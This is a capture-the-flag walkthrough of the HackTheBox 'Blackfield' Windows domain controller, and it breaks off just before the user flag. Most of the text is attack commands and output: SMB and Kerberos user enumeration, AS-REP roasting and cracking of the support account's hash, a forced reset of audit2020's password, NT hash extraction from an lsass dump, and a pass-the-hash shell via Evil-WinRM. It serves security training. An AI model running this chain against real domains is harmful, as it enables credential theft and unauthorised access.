HTB Blackfield Walkthrough
Welcome back to another HackTheBox machine pentesting session, this time we will tackle the Blackfield box.
Welcome back to another machine pentesting session from HackTheBox, this time I am going to tackle the Blackfield box.
As always I start off with an Nmap scan!
sudo nmap -A -T4 10.10.10.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:16 CEST
Nmap scan report for 10.10.10.192
Host is up (0.051s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-10 23:21:30Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7h04m14s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-10T23:21:51
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 50.28 ms 10.10.14.1
2 54.39 ms 10.10.10.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.54 seconds
I see a moderate list of open ports from the nmap scan. Lets try to enumerate with enum4linux.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ enum4linux -s /usr/share/enum4linux/share-list.txt 10.10.10.192
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Jun 11 10:57:35 2020
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
c$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
admin$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
ipc$ EXISTS
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 688, <SHARES> line 68.
[...]
enum4linux complete on Thu Jun 11 10:58:57 2020
Nothing particular to highlight, some shares, go deeper.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient -L 10.10.10.192
Enter WORKGROUP\in7rud3r's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Two interesting additional shares. The first on:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/forensic
Enter WORKGROUP\in7rud3r's password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
smb: \>
It seems to not be useful... for now. Try the second one:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield$ smbclient //10.10.10.192/profiles$
Enter WORKGROUP\in7rud3r's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 18:47:12 2020
.. D 0 Wed Jun 3 18:47:12 2020
AAlleni D 0 Wed Jun 3 18:47:11 2020
ABarteski D 0 Wed Jun 3 18:47:11 2020
ABekesz D 0 Wed Jun 3 18:47:11 2020
ABenzies D 0 Wed Jun 3 18:47:11 2020
[...]
ZScozzari D 0 Wed Jun 3 18:47:12 2020
ZTimofeeff D 0 Wed Jun 3 18:47:12 2020
ZWausik D 0 Wed Jun 3 18:47:12 2020
7846143 blocks of size 4096. 3952597 blocks available
I report only part of the list, but, trust me, it's a really huge list of users. I try to understand if there's something interesting inside the folders.
smb: \> cd AAlleni
smb: \AAlleni\> ls
. D 0 Wed Jun 3 18:47:11 2020
.. D 0 Wed Jun 3 18:47:11 2020
7846143 blocks of size 4096. 3952597 blocks available
smb: \AAlleni\> cd ..
smb: \> cd ABarteski
smb: \ABarteski\> ls
. D 0 Wed Jun 3 18:47:11 2020
.. D 0 Wed Jun 3 18:47:11 2020
7846143 blocks of size 4096. 3952469 blocks available
smb: \ABarteski\>
Could be all empty. To be (quite) sure that all the folder are empty I download all the content of the share on my machine and check it:
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
smb: \>
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ find . -name "*" | grep "/.*/"
This last command list all file name inside the folder, recursively; if something is on the subfolders, I'll show on the shell, but, nothing appears, so the folders are all empty. Anyway, I have a big list of users which I can use to create a file.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ cd smb/
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb$ cd ..
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ find ./smb/ -name "*" | cut -b 7- > user-list.txt
Now I need a list of password too, search from available files.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack$ sudo find /usr/share/ -name "*password*.txt"
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
/usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt
/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
/usr/share/metasploit-framework/data/wordlists/vnc_passwords.txt
/usr/share/cisco-torch/password.txt
/usr/share/setoolkit/htk-lite/commandinfo/password.txt
/usr/share/brutex/wordlists/vnc-default-passwords.txt
/usr/share/brutex/wordlists/password_weak.txt
/usr/share/brutex/wordlists/password_medium.txt
/usr/share/exploitdb-papers/papers/english/12914-mpi-and-password-cracking.txt
/usr/share/truecrack/most_common_password_10k.txt
/usr/share/doc/funkload/examples/demo/cmf/passwords.txt
/usr/share/commix/src/txt/passwords_john.txt
Ok, let me say that, I tried with a brute-force attack, but after some time I understand that the timing for this activity will be really too long, so I decide for a simplest attack.
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file ./user-list.txt
user_file => ./user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.10.192:445 - 10.10.10.192:445 - Starting SMB login bruteforce
[+] 10.10.10.192:445 - 10.10.10.192:445 - Success: '.\:' Guest
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\RVallandas:RVallandas',
[!] 10.10.10.192:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\APustulka:APustulka',
[...]
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\ATaueg:ATaueg',
[*] 10.10.10.192:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_login) >
But nothing found. Considering that I'm on metasploit framework tool, I start to search for kerberos' exploit.
msf5 auxiliary(scanner/smb/smb_login) > search kerberos
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Vulnerability
1 auxiliary/gather/get_user_spns 2014-09-27 normal No Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)
2 auxiliary/gather/kerberos_enumusers normal No Kerberos Domain User Enumeration
3 auxiliary/scanner/winrm/winrm_login normal No WinRM Login Utility
4 post/windows/escalate/golden_ticket normal No Windows Escalate Golden Ticket
This one could be interesting.
msf5 auxiliary(scanner/smb/smb_login) > info auxiliary/gather/kerberos_enumusers
Name: Kerberos Domain User Enumeration
Module: auxiliary/gather/kerberos_enumusers
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Matt Byrne <[email protected]>
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN yes The Domain Eg: demo.local
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER_FILE yes Files containing usernames, one per line
Description:
This module will enumerate valid Domain Users via Kerberos from an
unauthenticated perspective. It utilizes the different responses
returned by the service for valid and invalid users.
References:
https://nmap.org/nsedoc/scripts/krb5-enum-users.html
Let me try.
msf5 auxiliary(scanner/smb/smb_login) > use auxiliary/gather/kerberos_enumusers
msf5 auxiliary(gather/kerberos_enumusers) > set domain BLACKFIELD
domain => BLACKFIELD.htb
msf5 auxiliary(gather/kerberos_enumusers) > set rhosts 10.10.10.192
rhosts => 10.10.10.192
msf5 auxiliary(gather/kerberos_enumusers) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192
[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "rvallandas"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "rvallandas" does not exist
[*] 10.10.10.192:88 - Testing User: "apustulka"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "apustulka" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "audit2020"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "audit2020" is present
[...]
[*] 10.10.10.192:88 - Testing User: "svc_backup"...
[*] 10.10.10.192:88 - KDC_ERR_PREAUTH_REQUIRED - Additional pre-authentication required
[+] 10.10.10.192:88 - User: "svc_backup" is present
[...]
[*] 10.10.10.192:88 - Testing User: "support"...
[-] Auxiliary failed: NoMethodError undefined method `error_code' for #<Rex::Proto::Kerberos::Model::KdcResponse:0x0000561b96b38438>
[-] Call stack:
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:74:in `block in run'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `each'
[-] /usr/share/metasploit-framework/modules/auxiliary/gather/kerberos_enumusers.rb:65:in `run'
[*] Auxiliary module execution completed
Well, I identify some real accounts on the machine, but the execution stops on the "support" user, don't forget this, extract the final users not worked by the exploit and rerun it again to complete our original list.
msf5 auxiliary(gather/kerberos_enumusers) > exploit
[*] Running module against 10.10.10.192
[*] Validating options...
[*] Using domain: BLACKFIELD...
[*] 10.10.10.192:88 - Testing User: "gmaroufkhani"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "gmaroufkhani" does not exist
[...]
[*] 10.10.10.192:88 - Testing User: "ataueg"...
[*] 10.10.10.192:88 - KDC_ERR_C_PRINCIPAL_UNKNOWN - Client not found in Kerberos database
[*] 10.10.10.192:88 - User: "ataueg" does not exist
[*] Auxiliary module execution completed
Well, two good users (and one suspect): audit2020 and svc_backup. It should much more simple to attack with a brute-force, so I come back on the previous exploit with only these two users, but the process is too slow again. I have to search for different ways.
msf5 auxiliary(gather/kerberos_enumusers) > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > options
Module options (auxiliary/scanner/smb/smb_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ABORT_ON_LOCKOUT false yes Abort the run when an account lockout is detected
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DETECT_ANY_AUTH false no Enable detection of systems accepting any authentication
DETECT_ANY_DOMAIN false no Detect if domain is required for the specified user
PASS_FILE no File containing passwords, one per line
PRESERVE_DOMAINS true no Respect a username that contains a domain name.
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RECORD_GUEST false no Record guest-privileged random logins to the database
RHOSTS 10.10.10.192 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS true no Try the username as the password for all users
USER_FILE user-list.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /usr/share/truecrack/most_common_password_10k.txt
pass_file => /usr/share/truecrack/most_common_password_10k.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set user_file ''
user_file =>
msf5 auxiliary(scanner/smb/smb_login) > set smbUser audit2020
smbUser => audit2020
msf5 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(scanner/smb/smb_login) > exploit
[*] 10.10.10.192:445 - 10.10.10.192:445 - Starting SMB login bruteforce
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\audit2020:audit2020',
[!] 10.10.10.192:445 - No active DB -- Credential data will not be saved!
[-] 10.10.10.192:445 - 10.10.10.192:445 - Failed: '.\audit2020:password',
[...]
Another useful toolkit used for windows machine is impacket, I use it in many other machines here on HTB, it has many tools that could help you to "enumerate". I could use the smallest list with the three users (sure and doubt) that I identify in the previous step, but, I want to be sure about all the entries available to me, so, I execute the tool on all the entire list and... surprise.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -dc-ip 10.10.10.192 BLACKFIELD/ -no-pass -usersfile ../../user-list.txt
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
[-] invalid principal syntax
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD:7b456002ef8933746d6ce43ea72d7202$07cc3c311dd56116bd44ecac96cfc76d62bbbfa92a41c4579e7ddf08650e81b763eee96251f0e8b4c4c63f8f4dfc58a0cafbdda950912ee0f726247c0981232488fac2acc52179b6f1349e2baf1a5a7df442c0d22cfec12384133a9b88d585d33de25b157c39777f91f5245ae2738fe17ab386e0e313e55d0ccdad77e46093a93302631a7d8790295180d10d58bae24879b4650f20515a230a54547c17fbc5b9c55addc6caab793be4e0e3e202c006df39884a4afb13788eafe222a75563b6817501be4566ef3ea4bbf1ea4f2a9aa5f600c9e9a98f8480d1cca6f7ac94fd5e4c1d9afd11abac2a3e58259b245c2d
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
As I understand we confirm the presence of the two users (audit2020 and svc_backup) and the support user that gave us error on the metasploit framework, providing an hash password. Ok, take the hash in the hashcat format:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/impacket/examples$ ./GetNPUsers.py -format hashcat -dc-ip 10.10.10.192 BLACKFIELD/support -no-pass
Impacket v0.9.22.dev1+20200611.111621.760cb1ea - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for support
$krb5asrep$23$support@BLACKFIELD:fb60c0c7175cc8a20c23b981b97dc607$3ada2343cb0398525c6edbed97e176ba6f7216924bc97f745ea3d0dbc8b6aea5bdf18cb34c3106e7783584dc8bee0900fcee6980d57bbcdb1daaa2d61e593ec3befa8fe52c79de29dbca7a9ae959f816d383502054522ad3b72c796549231ed8c7731eaaccc8f10c2bb28a075a0aa8c1019bd128867db4dd222fc22b2271f419521c34d44d982d3ed9457b6d30b687fdad7eb2b856cd97c54dce354ea71073649dad5065db90544144d96cf726ae6b35dbb026693a41af5665631c77a04894377005ff8a82fe939d1dd16bb067cf779e166d76501072918f9879beb95c6d0ea4ce480da341b21f75858ae24287c6
And use john the rip to crack the hash:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ john --wordlist=/usr/share/wordlists/rockyou.txt support.hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD)
1g 0:00:01:02 DONE (2020-06-16 11:50) 0.01609g/s 230762p/s 230762c/s 230762C/s #00p3r..#+*=%
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Nice, password of the support user seems to be "#00^BlackKnight". I try the credential and the only way I can connect with is the rpcclient command:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ rpcclient -U BLACKFIELD\\support 10.10.10.192
Enter BLACKFIELD\support's password:
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[audit2020] rid:[0x44f]
user:[support] rid:[0x450]
user:[BLACKFIELD764430] rid:[0x451]
[...]
user:[BLACKFIELD438814] rid:[0x584]
user:[svc_backup] rid:[0x585]
user:[lydericlefebvre] rid:[0x586]
Next step is to search a way to exploit some information through the rpcclient; searching on internet:
I can change the password of the users, good, I have to try again. On the remote machine:
rpcclient $> setuserinfo2 audit2020 23 'ASDqwe123'
It seems that we are lucky today. And on the local machine:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ net rpc password audit2020 -U support -S 10.10.10.192
Enter new password for audit2020:
Enter WORKGROUP\support's password:
Good, again, come back on your steps and try an SMB connection with this new credential.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/hc-decr$ smbclient -U audit2020 //10.10.10.192/forensic
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 14:03:16 2020
.. D 0 Sun Feb 23 14:03:16 2020
commands_output D 0 Sun Feb 23 19:14:37 2020
memory_analysis D 0 Thu May 28 22:28:33 2020
tools D 0 Sun Feb 23 14:39:08 2020
7846143 blocks of size 4096. 3667024 blocks available
smb: \>
This time is the forensic shared folder to be accessible, fine. After a fast look at the file inside these folders, I understand that to investigate better could be fine if I download all the content on my PC and work locally. Anyway I can leave the files inside the tools folder, so, I start to download and stop it when the process starts to download that files. In fact, on the tools folder:
smb: \> cd tools\
smb: \tools\> ls
. D 0 Sun Feb 23 14:39:08 2020
.. D 0 Sun Feb 23 14:39:08 2020
sleuthkit-4.8.0-win32 D 0 Sun Feb 23 14:39:03 2020
sysinternals D 0 Sun Feb 23 14:35:25 2020
volatility D 0 Sun Feb 23 14:35:39 2020
7846143 blocks of size 4096. 4064625 blocks available
smb: \tools\>
These tools are usually used to investigate and create reports file of the system (like ones founded in the other folders); that are clues left there on purpose? Just to understand, search the first one on google:
The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data. The library can be incorporated into larger digital forensics tools and the command line tools can be directly used to find evidence.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \commands_output\domain_admins.txt of size 528 as domain_admins.txt (2.8 KiloBytes/sec) (average 2.8 KiloBytes/sec)
[...]
getting file \commands_output\tasklist.txt of size 9990 as tasklist.txt (52.7 KiloBytes/sec) (average 300.0 KiloBytes/sec)
getting file \memory_analysis\conhost.zip of size 37876530 as conhost.zip (1554.3 KiloBytes/sec) (average 1465.0 KiloBytes/sec)
[...]
getting file \memory_analysis\WmiPrvSE.zip of size 18303252 as WmiPrvSE.zip (997.3 KiloBytes/sec) (average 1285.9 KiloBytes/sec)
In the first folder seems to be a set of files exported from the logs activity of the machine and additional information about the system, I give a fast look at this, but I feel confident that nothing particular interesting could be found here, anyway, I have these files on my machine and I can come back later to understand better.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/commands_output$ ls -la
total 576
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Jun 20 09:59 .
drwxr-xr-x 4 in7rud3r in7rud3r 4096 Jun 20 10:10 ..
-rw-r--r-- 1 in7rud3r in7rud3r 528 Jun 20 09:59 domain_admins.txt
-rw-r--r-- 1 in7rud3r in7rud3r 962 Jun 20 09:59 domain_groups.txt
-rw-r--r-- 1 in7rud3r in7rud3r 16454 Jun 20 09:59 domain_users.txt
-rw-r--r-- 1 in7rud3r in7rud3r 518202 Jun 20 09:59 firewall_rules.txt
-rw-r--r-- 1 in7rud3r in7rud3r 1782 Jun 20 09:59 ipconfig.txt
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Jun 20 09:59 netstat.txt
-rw-r--r-- 1 in7rud3r in7rud3r 3976 Jun 20 09:59 route.txt
-rw-r--r-- 1 in7rud3r in7rud3r 4550 Jun 20 09:59 systeminfo.txt
-rw-r--r-- 1 in7rud3r in7rud3r 9990 Jun 20 09:59 tasklist.txt
In the second folder, I found something more interesting:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf conhost.zip
Archive contains:
conhost.DMP
Total 1 entries (104500231 bytes)
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ zip -sf ctfmon.zip
Archive contains:
ctfmon.DMP
Total 1 entries (69423930 bytes)
Dump files, that some specific dump can become back to me useful? Search on internet: "exploit DMP file from windows" and
Great, it seems I need the lsass dump and I'm so lucky that:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
Now, I spent hours trying to make it work mimikatz on my machine, but... nothing. So I search an alternative on the network and I found pypykatz:
And let me say, it works really well.
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ pypykatz lsa -o dmp-lsass-analisys.txt minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
[...]
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
== MSV ==
Username: Administrator
Domain: BLACKFIELD
LM: NA
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== SSP [25869]==
username
domainname
password None
== Kerberos ==
Username: Administrator
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [25869]==
username Administrator
domainname BLACKFIELD
password None
== DPAPI [25869]==
luid 153705
key_guid d1f69692-cfdc-4a80-959e-bab79c9c327e
masterkey 769c45bf7ceb3c0e28fb78f2e355f7072873930b3c1d3aef0e04ecbb3eaf16aa946e553007259bf307eb740f222decadd996ed660ffe648b0440d84cd97bf5a5
sha1_masterkey d04452f8459a46460939ced67b971bcf27cb2fb9
[...]
== LogonSession ==
authentication_id 406499 (633e3)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406499
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633e3]==
username svc_backup
domainname BLACKFIELD
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633e3]==
username svc_backup
domainname BLACKFIELD
password None
== DPAPI [633e3]==
luid 406499
key_guid 836e8326-d136-4b9f-94c7-3353c4e45770
masterkey 0ab34d5f8cb6ae5ec44a4cb49ff60c8afdf0b465deb9436eebc2fcb1999d5841496c3ffe892b0a6fed6742b1e13a5aab322b6ea50effab71514f3dbeac025bdf
sha1_masterkey 6efc8aa0abb1f2c19e101fbd9bebfb0979c4a991
The output is really long, so I extract the interesting parts. These interesting parts are the HASH coding of the password for the svc_backup user and the administrator. If you remember one of my past writeup (I hope to have already published, depend by the retirement order of the machine from HTB), we have the possibility to use the HASH code instead of the password on the Evil-WinRM tool that we are going to use, to connect to the remote machine and have available a shell on it. Obviously, I try with the Administrator's HASH for first:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u Administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62 -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r:
Swipe your right index finger across the fingerprint reader
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
But it doesn't work, probably it's an old dump and the password was changed. Let's try with the other user:
in7rud3r@kali:~/Dropbox/hackthebox/_10.10.10.192 - Blackfield/attack/smb2/memory_analysis$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -s '/ps1_scripts/' -e '/exe_files/'
Evil-WinRM shell v2.1
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
And finally, we have the shell. Very simple now for the user flag, try to check if is available to the svc_backup user which we are connected and take it from the desired folder:
